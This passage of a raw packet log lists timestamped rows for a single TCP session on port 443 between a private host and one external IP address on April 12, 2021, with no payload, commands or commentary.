Apr 12, 2021 07:47:45.851814032 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.851835966 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:45.852284908 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.852303028 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:45.852309942 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.024049044 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.024099112 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.024128914 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.024156094 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.024189949 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.024194956 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.024209976 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.024213076 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.024228096 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.024276972 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.024316072 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.024353027 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.024374962 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.024379969 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.024382114 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.024393082 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.024434090 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.024471998 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.024518967 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.024561882 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.024564981 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.024570942 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.024574041 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.024575949 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.024600983 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.024640083 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.024673939 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.024679899 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.024682045 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.024741888 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.024785042 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.024811983 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.024846077 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.024877071 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.024905920 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.024909973 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.024912119 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.024930000 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.024995089 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.025037050 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.025041103 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.025043964 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.025053978 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.025193930 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.025229931 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.025260925 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.025289059 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.025293112 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.025298119 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.025300026 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.025302887 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.025358915 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.025453091 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.025475025 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.025481939 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.025492907 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.025511026 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.025600910 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.025629997 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.025657892 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.025667906 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.025672913 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.025724888 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.025882006 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.025923014 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.025974035 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.026041031 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.026388884 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.026420116 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.026448011 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.026484013 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.026540995 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.026573896 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.026602030 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.026629925 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.026659012 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.026685953 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.026691914 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.026699066 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.026700974 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.026720047 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.026751995 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.026777983 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.026787996 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.026792049 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.026793957 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.026808023 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.026835918 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.026861906 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.026890039 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.026901960 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.026906967 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.026907921 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.026911020 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.026917934 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.026952028 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.027038097 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.027165890 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.027187109 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.027188063 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.027193069 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.027198076 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.027235985 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.027265072 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.027286053 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.027309895 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.027329922 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.027333975 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.027337074 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.027437925 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.027477026 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.027514935 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.027544975 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.027559042 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.027559996 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.027584076 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.027606010 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.027623892 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.027626991 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.027628899 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.027630091 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.027808905 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.027832985 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.027846098 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.027858019 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.027861118 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.027919054 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.027940989 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.027981997 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.027992964 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.028023958 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.028068066 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.028121948 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.028157949 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.028163910 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.028166056 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.028189898 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.028217077 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.028240919 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.028270960 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.028275967 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.028278112 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.028449059 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.030262947 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.045206070 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.199949026 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.200031042 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.200071096 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.200112104 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.200149059 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.200237989 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.200257063 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.200258970 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.200287104 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.200330019 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.200370073 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.200407028 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.200445890 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.200448036 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.200449944 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.200453043 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.200486898 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.200534105 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.200577021 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.200613976 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.200651884 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.200653076 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.200658083 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.200659990 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.200692892 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.200731039 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.200766087 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.200769901 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.200769901 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.200773001 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.200963020 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.201004028 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.201033115 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.201036930 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.201037884 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.201044083 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.201082945 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.201117992 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.201122046 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.201122046 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.201124907 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.201169014 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.201210976 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.201247931 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.201287031 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.201328039 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.201365948 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.201370001 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.201373100 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.201373100 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.201550961 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.201591015 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.201628923 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.201669931 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.201741934 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.201781034 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.201783895 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.201786995 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.201790094 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.201822042 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.201859951 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.201898098 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.201934099 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.201971054 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.202008009 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.202013969 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.202016115 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.202158928 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.202281952 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.202323914 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.202362061 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.202373981 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.202402115 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.202403069 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.202406883 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.202445984 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.202482939 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.202522039 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.202560902 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.202599049 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.202603102 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.202605963 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.202609062 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.202651024 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.202652931 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.202657938 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.202692032 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.202730894 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.202734947 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.202769041 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.202780962 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.202806950 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.202845097 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.202881098 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.202908039 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.202912092 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.202914953 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.203073025 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.203114986 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.203116894 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.203155041 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.203162909 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.203205109 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.203206062 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.203243971 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.203247070 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.203284025 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.203288078 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.203290939 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.203321934 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.203363895 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.205872059 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.205926895 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.205970049 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.206007004 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.206043005 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.206054926 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.206058979 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.220436096 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.220493078 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.220524073 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.220622063 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.220654011 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.220663071 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.220681906 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.220686913 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.220721006 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.220762968 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.221060038 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.221102953 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.221141100 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.221146107 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.221170902 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.221184015 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.221188068 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.221209049 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.221255064 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.221257925 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.221307993 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.221349955 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.221980095 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.222022057 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.222063065 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.222089052 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.222121954 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.222131014 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.222172022 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.222208977 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.222215891 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.222220898 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.222245932 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.222285986 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.222322941 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.222325087 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.222371101 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.222400904 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.222403049 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.222407103 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.222413063 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.222440004 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.222477913 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.222502947 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.222506046 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.222517014 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.222527981 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.222554922 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.222592115 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.222630024 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.222632885 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.222637892 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.222639084 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.222898006 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.376123905 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.376204014 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.376246929 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.376265049 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.376281023 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.376286030 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.376324892 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.376360893 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.376363039 CEST	443	49172	103.67.236.191	192.168.2.22
Apr 12, 2021 07:47:46.376365900 CEST	49172	443	192.168.2.22	103.67.236.191
Apr 12, 2021 07:47:46.376368046 CEST	49172	443	192.168.2.22	103.67.236.191
